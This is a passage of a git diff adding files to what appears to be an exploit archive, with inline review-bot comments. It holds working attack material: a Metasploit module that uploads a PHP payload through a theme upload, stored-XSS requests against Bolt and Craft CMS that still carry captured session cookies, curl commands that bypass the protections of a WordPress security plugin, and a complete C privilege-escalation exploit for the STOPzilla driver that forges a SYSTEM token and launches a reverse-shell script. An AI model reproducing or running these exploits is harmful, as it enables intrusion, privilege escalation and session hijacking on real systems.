Login failed") + exit 0 + end +## +# Loading phase of the vulnerable file +## + boundary = Rex::Text.rand_text_alphanumeric(29) + + data2 = "-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"LOGO_FILE\"\r\n\r\n\r\n" + data2 << "-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"FAVICON_FILE\"; filename=\"akkus.php\"" + data2 << "\r\nContent-Type: text/html\r\n\r\n" + data2 << payload.encoded + data2 << "\n\r\n-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"CSS_FILE\"\r\n\r\n\r\n" + data2 << "-----------------------------{boundary}" + data2 << "\r\nContent-Disposition: form-data; name=\"CSRF_TOKEN\"\r\n\r\n" + data2 << "#{token}" + data2 << "\r\n-----------------------------{boundary}--\r\n" + + res = send_request_raw( + { + 'method' => "POST", + 'uri' => normalize_uri(target_uri, "/Web/admin/manage_theme.php?action=update"), + 'data' => data2, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}', + }, + 'cookie' => cookie + }) + + if res and res.code == 200 + print_good "Payload was successfully uploaded." + else + print_error "Upload failed." + return + end +## +# Command execution and shell retrieval +## + print_status("Attempting to execute the payload...") + + command = payload.encoded + + res = send_request_cgi( + { + 'uri' => normalize_uri(target_uri, "/Web/custom-favicon.php"), + 'cookie' => cookie + }, 25) + + + if res and res.code == 200 + print_good "Payload executed successfully" + end + end +end +## +# End +## \ No newline at end of file diff --git a/exploits/php/webapps/46488.txt b/exploits/php/webapps/46488.txt new file mode 100644 index 000000000..acd759b3c --- /dev/null +++ b/exploits/php/webapps/46488.txt 
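Review bot: In the "Reading CSRF Token" section `html = control.body` re-reads the dashboard response instead of `csrf.body`, so the `Look and Feel` check never inspects the manage_theme page and its failure message ("User information is incorrect") is misleading; `html = csrf.body`. The two `exit 0` calls terminate the whole framework process rather than the module run; the Metasploit idiom is `fail_with(Failure::NoAccess, 'Login failed')`. `boundary` is generated with `Rex::Text.rand_text_alphanumeric` but every occurrence in `data2` and in the Content-Type header is the literal text `{boundary}` (the strings are not interpolated), so the random boundary is dead code; `command = payload.encoded` is likewise unused, and the `return res` after the `if/else` in `check` is unreachable.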
@@ -0,0 +1,79 @@ +# Exploit Title: Cross-Site Request Forgery(CSRF) of zzzphp cms 1.6.1 +# Google Dork: intext:"2015-2019 zzcms.com" + +# Date: 26/02/2019 + +# Exploit Author: Yang Chenglong + +# Vendor Homepage: http://www.zzzcms.com/index.html + +# Software Link: http://115.29.55.18/zzzphp.zip + +# Version: 1.6.1 + +# Tested on: windows/Linux,iis/apache + +# CVE : CVE-2019-9082 + +Due to the absence of CSRF token in the request, attackers can forge the post request and insert malicious codes into the template file which leads to dynamic code evaluation. + +Exploit: + + + + + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + + + +
+ + + + + + + + + + + + + +Save the codes above as html file and host it on a web server. Send the link to the administrator of the website and ask him to click the link(request for exchange friend link or any other possible method), if the person has logged on to the admin panel, it will automatically insert malicious codes in to the template file and leads to dynamic code evaluation. + +Remarks: This is a follow up exploit of CVE-2019-9041, whose exploit is here: https://www.exploit-db.com/exploits/46454 \ No newline at end of file diff --git a/exploits/php/webapps/46495.txt b/exploits/php/webapps/46495.txt new file mode 100644 index 000000000..310340d83 --- /dev/null +++ b/exploits/php/webapps/46495.txt 
@@ -0,0 +1,30 @@
+# Exploit Title: Bolt CMS - 3.6.4 - Cross-Site Scripting
+# Date: 2019-03-04
+# Exploit Author: Ismail Tasdelen
+# Vendor Homepage: https://bolt.cm/
+# Software Link : https://github.com/bolt/bolt
+# Software : Bolt CMS - v 3.6.4
+# Version : v 3.6.4
+# Vulernability Type : Cross-site Scripting
+# Vulenrability : Stored XSS
+# CVE : CVE-2019-9553
+
+# The XSS vulnerability has been discovered in the Bolt CMS web application software due to its vulnerability in the source code in version 3.6.4.
+
+# HTTP POST Request :
+
+POST /bolt/editcontent/pages HTTP/1.1
+Host: bolt-up3x24.bolt.dockerfly.com
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://bolt-up3x24.bolt.dockerfly.com/bolt/editcontent/pages
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 562
+DNT: 1
+Connection: close
+Cookie: bolt_session_5c201ab91521b607e364bc74271e51f1=3d540aa1d0a0fc38dde995dc6ba8a32e; bolt_authtoken_5c201ab91521b607e364bc74271e51f1=240049afe75abc53fbe51e75103ed138261da69b180ff241b7e815027c39f6fb
+Upgrade-Insecure-Requests: 1
+
+content_edit%5B_token%5D=u1EA_Zhor_EwrIyqIt-PLLK02DccGgZDDWFQm1325_8&editreferrer=&contenttype=pages&title=%22%3E%3Cscript%3Ealert%28%22ismailtasdelen%22%29%3C%2Fscript%3E&slug=script-alert-ismailtasdelen-script&image%5Bfile%5D=2019-03%2Fimg-src-x-onerror-prompt-1-.png&files%5B%5D=&teaser=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&body=%3Cp%3EBolt+3.6.4+CMS%3C%2Fp%3E%0D%0A&template=&taxonomy%5Bgroups%5D%5B%5D=&taxonomy-order%5Bgroups%5D=0&id=&status=draft&datepublish=2019-03-04+08%3A24%3A47&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=1
\ No newline at end of file
diff --git a/exploits/php/webapps/46496.txt b/exploits/php/webapps/46496.txt
new file mode 100644
index 000000000..1e043e941
--- /dev/null
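Review bot: The captured request carries what look like live session material — the `bolt_session_...` and `bolt_authtoken_...` cookies and the `content_edit[_token]` CSRF value — for the instance at `bolt-up3x24.bolt.dockerfly.com`; an advisory should redact these (`Cookie: [REDACTED]`) since they add nothing to the reproduction and remain replayable for as long as the session lives. The prose never states which field is affected; from the body it is the `title` parameter of the page-edit form (and the slug derived from it), which is worth saying so a defender knows which rendering path to check for missing output encoding. `Vulernability Type` and `Vulenrability` are misspelt in the header, and the description sentence ("due to its vulnerability in the source code") says nothing beyond the title.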
+++ b/exploits/php/webapps/46496.txt 
@@ -0,0 +1,31 @@ +# Exploit Title: Craft CMS 3.1.12 Pro - Cross-Site Scripting +# Date: 2019-03-04 +# Exploit Author: Ismail Tasdelen +# Vendor Homepage: https://craftcms.com/ +# Software Link : https://github.com/craftcms/cms +# Software : Craft CMS 3.1.12 Pro +# Version : 3.1.12 Pro +# Vulernability Type : Cross-site Scripting +# Vulenrability : Stored XSS +# CVE : CVE-2019-9554 + +# In the 3.1.12 Pro version of the Craft CMS web application, the XSS vulnerability has been discovered +# in the header insertion field when adding source code. + +# HTTP POST Request : + +POST /XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://localhost/XXX/s/admin/entries/news/258-craft-cms-3-1-12-pro-xss-test +Content-Type: application/x-www-form-urlencoded +Content-Length: 1936 +DNT: 1 +Connection: close +Cookie: CraftSessionId=2ea7nf0jqr0dtl3ioesmlpibfn; CRAFT_CSRF_TOKEN=deccdc1b2ef00dd8580186987fe54e3cdf92305c6150cffb523f392540a2d4aba%3A2%3A%7Bi%3A0%3Bs%3A16%3A%22CRAFT_CSRF_TOKEN%22%3Bi%3A1%3Bs%3A208%3A%22iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7Cf42be7b0c353ba14582c1e682a6150947da39c970d31f5cbc3ddc4c0bbe14608iuw8Yd67pzxgeP7PrY9zqL5nYEB0Uor6JeS779fM%7C1%7C%242a%2413%245j8bSRoKQZipjtIg6FXWR.kGRR3UfCL.QeMIt2yTRH1.hCNHLQKtq%22%3B%7D; 1031b8c41dfff97a311a7ac99863bdc5_identity=9804f2668edfba25525881f3badabcfe5adb1d71f4dcb4504daee11a78bc94a3a%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_identity%22%3Bi%3A1%3Bs%3A197%3A%22%5B%221%22%2C%22%5B%5C%22dQCnIq3FbN0KsbTg8nbPQxV3JvEWqbBzqXjf0nwbvJDN0LjgArYGZe4WaYfo3AiYzm8CaeKPjT9CUw_8mnAd_D89-nf39hYXRRoq%5C%22%2Cnull%2C%5C%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A65.0%29+Gecko%2F20100101+Firefox%2F65.0%5C%22%5D%22%2C3600%5D%22%3B%7D; 
1031b8c41dfff97a311a7ac99863bdc5_username=53dcb198f73d427f239351d0c5ac1bb1e4fbba88fab3cc128854b0232098896da%3A2%3A%7Bi%3A0%3Bs%3A41%3A%221031b8c41dfff97a311a7ac99863bdc5_username%22%3Bi%3A1%3Bs%3A5%3A%22admin%22%3B%7D +Upgrade-Insecure-Requests: 1 + +CRAFT_CSRF_TOKEN=dgLN-H1XWhJgLIiYSYl52Z4wVJZttVH_wDyF9k5Bi00GXCSSTri7oLF9innUOlavPu4AhcUUuEoHMpGSl7-GbdK9oBrDQT5p3BN2frKMuzd6IgTMdbWhgSXqx6pj4hV1UyLi8rZBnAqaMQT1eP_1_4X0fqZYp5Q4GfmlV7iq26NdVxnY_X03CauMkmElBmRoa-6A_U8FGYjg2ipWdesOvZa18UZsUHMNWUWBmYzHJc-82MSRtiZ19DS1iTzV74nlnSaY3vva5oBQFEDtnwZhqR93usAkM2wlEFbw_yzZTonsaW3sHPlkkZl5x8YbLvl7TDl3pXmB3e3NG75Ltl9hzQ6NM7D2dtl7MwepoPSO41vqj8Es8nQOUOgkEh-BtdgOTRJg_0TTlOJHifTOB4EhFmNAgJeHdao6olhxgkCmkcmyhATeP8LED0mL_G7C25eWMw5cms0oWHudxvcyEjFdDiaSsYFrN3is0ekOYx_TbO7E2roXNjkDZy0M5q_Kn3KdkrODw-QVIJJ3-adtsKLAka9fzIyz68joE1oIoc5NFdg%3D&action=entries%2Fsave-entry&redirect=ac40ade69b3fe7bc96c8157907aae4128d2b64f411148be4af2141edea85b42fentries%2Fnews§ionId=2&entryId=258&title=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BfeaturedEntry%5D=&fields%5BfeaturedImage%5D=&fields%5BshortDescription%5D=%3Cp%3ECraft+CMS+3.1.12+Pro+-+XSS+TEST%3C%2Fp%3E&fields%5Bheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5Bsubheading%5D=Craft+CMS+3.1.12+Pro+-+XSS+TEST&fields%5BarticleBody%5D=&fields%5BarticleBody%5D%5B259%5D%5Btype%5D=text&fields%5BarticleBody%5D%5B259%5D%5Benabled%5D=1&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Btext%5D=%3Cfigure%3E%3Ca+href%3D%22%22%3E%3Cimg+src%3D%22https%3A%2F%2Fdemo.craftcms.com%2F3Rdj0OGqru%2Fs%2Fassets%2Fsite%2F-.png%23asset%3A257%3Aurl%22+alt%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+title%3D%22%26quot%3B%3Ealert%28%26quot%3Bismailtasdelen%26quot%3B%29%22+data-image%3D%228ilh6edpse56%22%3E%3C%2Fa%3E%3Cfigcaption%3E%22%26gt%3B%3C%2Ffigcaption%3E%3C%2Ffigure%3E&fields%5BarticleBody%5D%5B259%5D%5Bfields%5D%5Bposition%5D=left&typeId=2&slug=craft-cms-3-1-12-pro-xss-test&author=&author%5B%5D=1&postDate%5Bdate%5D=3%2F4%2F2019&postDate%5Btimezone%5D=UTC
&postDate%5Btime%5D=8%3A55+AM&postDate%5Btimezone%5D=UTC&expiryDate%5Bdate%5D=&expiryDate%5Btimezone%5D=UTC&expiryDate%5Btime%5D=&expiryDate%5Btimezone%5D=UTC&enabled=1&revisionNotes= \ No newline at end of file diff --git a/exploits/php/webapps/46497.txt b/exploits/php/webapps/46497.txt new file mode 100644 index 000000000..57292aeb1 --- /dev/null +++ b/exploits/php/webapps/46497.txt 
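Review bot: The description says the payload goes into "the header insertion field", but in the request `fields[heading]` and `fields[subheading]` hold benign text and the only injected markup is in `fields[articleBody][259][fields][text]`, inside the `alt` and `title` attributes of an `<img>` and in the `<figcaption>`, encoded as `&quot;>alert(&quot;ismailtasdelen&quot;)`. Because the quotes arrive already entity-encoded, execution depends on the renderer decoding them a second time, and the advisory shows no response or rendered output demonstrating that it does. Suggest naming the affected field precisely in the header (`articleBody` Matrix block, `text` sub-field) together with the control-panel or site page on which the payload fired, and stating that the request requires an authenticated control-panel user — the `*_identity`/`*_username` cookies and `CRAFT_CSRF_TOKEN` shown are session-bound and cannot be replayed as-is.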
@@ -0,0 +1,65 @@ +# Exploit Title: WordPress Cerber Security, Antispam & Malware Scan - Multiple Bypass Vulnerabilities +# Type: WordPress Plugin +# Date: 2019-03-04 +# Active installs: 100,000+ +# Version: 8.0 +# Software Link: https://wordpress.org/plugins/wp-cerber/ +# Exploit Author: ed0x21son +# Category: WebApps, WordPress +# Tested on: Linux/WordPress 5.1 + +[Vulnerabilities] + + +#1: Stop user enumeration bypass: + +U can bypass user enumeration protection if u use Post method instead of Get. + +curl http://localhost/ -d author=1 + + + +#2: Protect admin scripts bypass: + +U can bypass admin scripts protection if u add one or more slashes to the uri. + +curl 'http://localhost/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils' +curl 'http://localhost/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar' + + + +#3: Protects wp-login.php, wp-signup.php and wp-register.php from attacks bypass: + +U can bypass this protection if u encode any character in the uri. + +curl http://localhost/wp-login%2ephp +curl -v http://localhost/wp-signup%2ephp +curl -v http://localhost/wp-register%2ephp + + + +#4: Hide login URL bypass: + +U can bypass if u encode any character in the uri, Cerber will return the secret slug in the Location header field. + +curl -I http://localhost/wp-%61dmin/ + + + +#5: Stop user enumeration via REST API bypass: + +U can bypass if u insert /index.php/ between domain and rest route. + +curl http:/localhost/index.php/wp-json/wp/v2/users/ + + + +#6: Disable REST API bypass: + +Same above. + +curl http:/localhost/index.php/wp-json/wp/v2/ + + + +--ed0x21son \ No newline at end of file diff --git a/exploits/windows/dos/46485.html b/exploits/windows/dos/46485.html new file mode 100644 index 000000000..1ecb577c3 --- /dev/null +++ b/exploits/windows/dos/46485.html @@ -0,0 +1,184 @@ + + \ No newline at end of file 
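Review bot: Cases #5 and #6 use `http:/localhost/...` with a single slash; curl silently repairs it, but the canonical command is `curl http://localhost/index.php/wp-json/wp/v2/users/`, and a reader pasting it into another client gets a different request. All six bypasses appear to share one root cause — the plugin matches on the raw request string (path spelling, percent-encoding, duplicate slashes, `/index.php/` prefix) and on GET parameters only — so a short summary above the list, e.g. `Root cause: protections compare the raw URI / $_GET; percent-decode, collapse duplicate slashes, strip /index.php and include $_POST before matching`, would let defenders verify a fix instead of re-testing six payloads. Case #4 is also an information disclosure in its own right (the hidden login slug is returned in the `Location` header), which is worth calling out separately from the bypass. Finally, no fixed version is given, so readers cannot tell whether releases after 8.0 address any of these.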
diff --git a/exploits/windows/local/45496.c b/exploits/windows/local/45496.c new file mode 100644 index 000000000..bbb9534d7 --- /dev/null +++ b/exploits/windows/local/45496.c 
@@ -0,0 +1,448 @@ +/* +3y3t3m th!s - Ivan Ivanovic Ivanov Иван-дурак +недействительный 31337 Team + +clone of https://www.exploit-db.com/exploits/45401 + +deb yaaaa +win7 narrrr (fails) + +ch@ng3 p@yl0@d!!!!!!!!!!!!! +*/ + +#include +#include +#include +#include + +#pragma comment(lib,"winsta.lib") +#pragma comment(lib,"advapi32.lib") + +#define SystemHandleInformation 16 +#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xc0000004L) +#define STATUS_SUCCESS ((NTSTATUS)0x00000000L) + +typedef unsigned __int64 QWORD; + + +typedef struct _SID_BUILTIN +{ + UCHAR Revision; + UCHAR SubAuthorityCount; + SID_IDENTIFIER_AUTHORITY IdentifierAuthority; + ULONG SubAuthority[2]; +} SID_BUILTIN, *PSID_BUILTIN; + + +typedef struct _SID_INTEGRITY +{ + UCHAR Revision; + UCHAR SubAuthorityCount; + SID_IDENTIFIER_AUTHORITY IdentifierAuthority; + ULONG SubAuthority[1]; +} SID_INTEGRITY, *PSID_INTEGRITY; + + +typedef NTSYSAPI NTSTATUS (NTAPI *_ZwCreateToken)( + OUT PHANDLE TokenHandle, + IN ACCESS_MASK DesiredAccess, + IN POBJECT_ATTRIBUTES ObjectAttributes, + IN TOKEN_TYPE Type, + IN PLUID AuthenticationId, + IN PLARGE_INTEGER ExpirationTime, + IN PTOKEN_USER User, + IN PTOKEN_GROUPS Groups, + IN PTOKEN_PRIVILEGES Privileges, + IN PTOKEN_OWNER Owner, + IN PTOKEN_PRIMARY_GROUP PrimaryGroup, + IN PTOKEN_DEFAULT_DACL DefaultDacl, + IN PTOKEN_SOURCE Source +); + +typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( + ULONG SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength); + + + +int GetWindowsVersion() +{ + int ver = 0; + OSVERSIONINFO osvi; + + + ZeroMemory(&osvi, sizeof(OSVERSIONINFO)); + osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); + + GetVersionEx(&osvi); + + if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 1) ver = 1; // Windows 7 + if (osvi.dwMajorVersion == 6 && osvi.dwMinorVersion == 2) ver = 2; // Windows 10 + + return ver; +} + +int AddAccountToAdminGroup(HANDLE hTokenElevated) +{ + STARTUPINFO si; + 
PROCESS_INFORMATION pi; + DWORD currentusersize; + char currentuser[100]; + char netcommand[15000]; + + + ZeroMemory(&si, sizeof(STARTUPINFO)); + ZeroMemory(&pi, sizeof(PROCESS_INFORMATION)); + si.cb = sizeof(STARTUPINFO); + + currentusersize = sizeof(currentuser); + + if (!GetUserName(currentuser, ¤tusersize)) + { + printf("\n[-] Failed to obtain current username: %d\n\n", GetLastError()); + return -1; + } + + printf("\n[*] Creating new process..."); + // The command or binary file to be executed can be changed here + sprintf(netcommand, "powershell.exe .\\rev.ps1"); + + if (!CreateProcessAsUser(hTokenElevated, NULL, netcommand, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) + { + printf("\n[-] Failed to execute command (%d) Run exploit again\n\n", GetLastError()); + return -1; + } + printf("\n[+] Executed command successfully\n"); + + return 0; +} + + + +PTOKEN_PRIVILEGES SetPrivileges() +{ + PTOKEN_PRIVILEGES privileges; + LUID luid; + int NumOfPrivileges = 5; + int nBufferSize; + + + nBufferSize = sizeof(TOKEN_PRIVILEGES) + sizeof(LUID_AND_ATTRIBUTES) * NumOfPrivileges; + privileges = (PTOKEN_PRIVILEGES) LocalAlloc(LPTR, nBufferSize); + + privileges->PrivilegeCount = NumOfPrivileges; + + LookupPrivilegeValue(NULL, SE_TCB_NAME, &luid); + privileges->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[0].Luid = luid; + + LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid); + privileges->Privileges[1].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[1].Luid = luid; + + LookupPrivilegeValue(NULL, SE_ASSIGNPRIMARYTOKEN_NAME, &luid); + privileges->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[2].Luid = luid; + + LookupPrivilegeValue(NULL, SE_TAKE_OWNERSHIP_NAME, &luid); + privileges->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED; + privileges->Privileges[3].Luid = luid; + + LookupPrivilegeValue(NULL, SE_IMPERSONATE_NAME, &luid); + privileges->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED; + 
privileges->Privileges[4].Luid = luid; + + return privileges; +} + + + +PSID GetLocalSystemSID() +{ + PSID psid = NULL; + SID_IDENTIFIER_AUTHORITY sidAuth = SECURITY_NT_AUTHORITY; + + + if (AllocateAndInitializeSid(&sidAuth, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &psid) == FALSE) + { + printf("\n[-] AllocateAndInitializeSid failed %d\n", GetLastError()); + return NULL; + } + + return psid; +} + + + +LPVOID GetInfoFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS type) +{ + DWORD dwLengthNeeded; + LPVOID lpData = NULL; + + + if (!GetTokenInformation(hToken, type, NULL, 0, &dwLengthNeeded) && GetLastError() != ERROR_INSUFFICIENT_BUFFER) + { + printf("\n[-] Failed to initialize GetTokenInformation %d", GetLastError()); + return NULL; + } + + lpData = (LPVOID)LocalAlloc(LPTR, dwLengthNeeded); + GetTokenInformation(hToken, type, lpData, dwLengthNeeded, &dwLengthNeeded); + + return lpData; +} + + + +QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID) +{ + _NtQuerySystemInformation NtQuerySystemInformation; + PSYSTEM_HANDLE_INFORMATION pSysHandleInfo; + ULONG i; + PSYSTEM_HANDLE_ENTRY pHandle; + QWORD TokenAddress = 0; + DWORD nSize = 4096; + DWORD nReturn; + BOOL tProcess; + HANDLE hToken; + + + if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE) + { + printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError()); + return -1; + } + + NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); + + if (!NtQuerySystemInformation) + { + printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); + return -1; + } + + do + { + nSize += 4096; + pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize); + } while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH); + + printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken); + + for (i = 
0; i < pSysHandleInfo->Count; i++) + { + + if (pSysHandleInfo->Handle[i].OwnerPid == MyProcessID && pSysHandleInfo->Handle[i].HandleValue == hToken) + { + TokenAddress = pSysHandleInfo->Handle[i].ObjectPointer; + } + } + + HeapFree(GetProcessHeap(), 0, pSysHandleInfo); + return TokenAddress; +} + + + +HANDLE CreateUserToken(HANDLE hToken) +{ + _ZwCreateToken ZwCreateToken; + HANDLE hTokenElevated; + NTSTATUS status; + int i; + DWORD dwSize = 0; + TOKEN_USER userToken; + PTOKEN_PRIVILEGES privileges = NULL; + PTOKEN_OWNER ownerToken = NULL; + PTOKEN_GROUPS groups = NULL; + PTOKEN_PRIMARY_GROUP primary_group = NULL; + PTOKEN_DEFAULT_DACL default_dacl = NULL; + PLUID pluidAuth; + LARGE_INTEGER li; + PLARGE_INTEGER pli; + LUID authid = SYSTEM_LUID; + LUID luid; + PSID_AND_ATTRIBUTES pSid; + SID_BUILTIN TkSidLocalAdminGroup = { 1, 2, { 0, 0, 0, 0, 0, 5 }, { 32, DOMAIN_ALIAS_RID_ADMINS } }; + SECURITY_QUALITY_OF_SERVICE sqos = { sizeof(sqos), SecurityImpersonation, SECURITY_STATIC_TRACKING, FALSE }; + OBJECT_ATTRIBUTES oa = { sizeof(oa), 0, 0, 0, 0, &sqos }; + TOKEN_SOURCE SourceToken = { { '!', '!', '!', '!', '!', '!', '!', '!' 
}, { 0, 0 } }; + SID_IDENTIFIER_AUTHORITY nt = SECURITY_NT_AUTHORITY; + PSID lpSidOwner = NULL; + SID_INTEGRITY IntegritySIDSystem = { 1, 1, SECURITY_MANDATORY_LABEL_AUTHORITY, SECURITY_MANDATORY_SYSTEM_RID }; + + + ZwCreateToken = (_ZwCreateToken)GetProcAddress(LoadLibraryA("ntdll.dll"), "ZwCreateToken"); + + if (ZwCreateToken == NULL) + { + printf("[-] Unable to resolve ZwCreateToken: %d\n\n", GetLastError()); + return NULL; + } + + groups = (PTOKEN_GROUPS)GetInfoFromToken(hToken, TokenGroups); + primary_group = (PTOKEN_PRIMARY_GROUP)GetInfoFromToken(hToken, TokenPrimaryGroup); + default_dacl = (PTOKEN_DEFAULT_DACL)GetInfoFromToken(hToken, TokenDefaultDacl); + + pSid = groups->Groups; + + for (i=0; iGroupCount; i++, pSid++) + { + PISID piSid = (PISID)pSid->Sid; + + if (pSid->Attributes & SE_GROUP_INTEGRITY) + { + memcpy(pSid->Sid, &IntegritySIDSystem, sizeof(IntegritySIDSystem)); + } + + if (piSid->SubAuthority[piSid->SubAuthorityCount - 1] == DOMAIN_ALIAS_RID_USERS) + { + memcpy(piSid, &TkSidLocalAdminGroup, sizeof(TkSidLocalAdminGroup)); // Found RID_USERS membership, overwrite with RID_ADMINS + pSid->Attributes = SE_GROUP_ENABLED; + } + else + { + pSid->Attributes &= ~SE_GROUP_USE_FOR_DENY_ONLY; + pSid->Attributes &= ~SE_GROUP_ENABLED; + } + } + + pluidAuth = &authid; + li.LowPart = 0xFFFFFFFF; + li.HighPart = 0xFFFFFFFF; + pli = &li; + + AllocateAndInitializeSid(&nt, 1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &lpSidOwner); + userToken.User.Sid = lpSidOwner; + userToken.User.Attributes = 0; + + AllocateLocallyUniqueId(&luid); + SourceToken.SourceIdentifier.LowPart = luid.LowPart; + SourceToken.SourceIdentifier.HighPart = luid.HighPart; + + ownerToken = (PTOKEN_OWNER) LocalAlloc(LPTR, sizeof(PSID)); + ownerToken->Owner = GetLocalSystemSID(); + + privileges = SetPrivileges(); + + status = ZwCreateToken(&hTokenElevated, + TOKEN_ALL_ACCESS, + &oa, + TokenPrimary, + pluidAuth, + pli, + &userToken, + groups, + privileges, + ownerToken, + primary_group, + 
default_dacl, + &SourceToken); + + if (status == STATUS_SUCCESS) + { + printf("\n[+] New token created successfully\n"); + return hTokenElevated; + } + else + { +// printf("\n[-] Failed to create new token %08x\n", status); + return NULL; + } + + if (lpSidOwner) FreeSid(lpSidOwner); + if (groups) LocalFree(groups); + if (privileges) LocalFree(privileges); + if (primary_group) LocalFree(primary_group); + if (default_dacl) LocalFree(default_dacl); + if (ownerToken) { if(ownerToken->Owner) FreeSid(ownerToken->Owner); LocalFree(ownerToken); } + + return NULL; +} + + + +int main(int argc, char *argv[]) +{ + + QWORD TokenAddressTarget; + QWORD SepPrivilegesOffset = 0x40; + QWORD PresentByteOffset; + QWORD EnableByteOffset; + QWORD TokenAddress; + HANDLE hDevice; + char devhandle[MAX_PATH]; + DWORD dwRetBytes = 0; + HANDLE hTokenCurrent; + HANDLE hTokenElevate; + + + printf("-------------------------------------------------------------------------------\n"); + printf(" STOPzilla AntiMalware (szkg64.sys) Arbitrary Write EoP Exploit \n"); + printf(" Tested on 64bit Windows 7 / Windows 10 (1803) \n"); + printf("-------------------------------------------------------------------------------\n"); + + TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId()); + printf("\n[i] Address of current process token 0x%p", TokenAddress); + + TokenAddressTarget = TokenAddress + SepPrivilegesOffset; + printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget); + + PresentByteOffset = TokenAddressTarget + 0x0; + printf("[i] Present bits at 0x%p will be overwritten\n", PresentByteOffset); + + EnableByteOffset = TokenAddressTarget + 0x8; + printf("[i] Enabled bits at 0x%p will be overwritten", EnableByteOffset); + + sprintf(devhandle, "\\\\.\\%s", "msprocess"); + + hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); + + if(hDevice == 
INVALID_HANDLE_VALUE) + { + printf("\n[-] Open %s device failed\n\n", devhandle); + return -1; + } + else + { + printf("\n[+] Open %s device successful", devhandle); + } + + + if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hTokenCurrent)) + { + printf("[-] Failed OpenProcessToken() %d\n\n", GetLastError()); + return NULL; + } + printf("[+] OpenProcessToken() handle opened successfully"); + + do + { + printf("\n[*] Overwriting _SEP_TOKEN_PRIVILEGES bits"); + DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL); + DeviceIoControl(hDevice, 0x80002063, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL); + hTokenElevate = CreateUserToken(hTokenCurrent); + Sleep(500); + } while (hTokenElevate == NULL); + + if (GetWindowsVersion() == 1) + { + printf("[i] Running Windows 7"); + printf("\n[*] Exploit will NOT be run!"); + } + if (GetWindowsVersion() == 2) + { + printf("[i] Running Windows 10"); + AddAccountToAdminGroup(hTokenElevate); + } + else if (GetWindowsVersion() == 0) + { + printf("[i] Exploit not tested on this OS\n\n"); + } + + CloseHandle(hDevice); + + return 0; +} \ No newline at end of file diff --git a/exploits/windows/webapps/46487.py b/exploits/windows/webapps/46487.py new file mode 100755 index 000000000..4d695651f --- /dev/null +++ b/exploits/windows/webapps/46487.py 
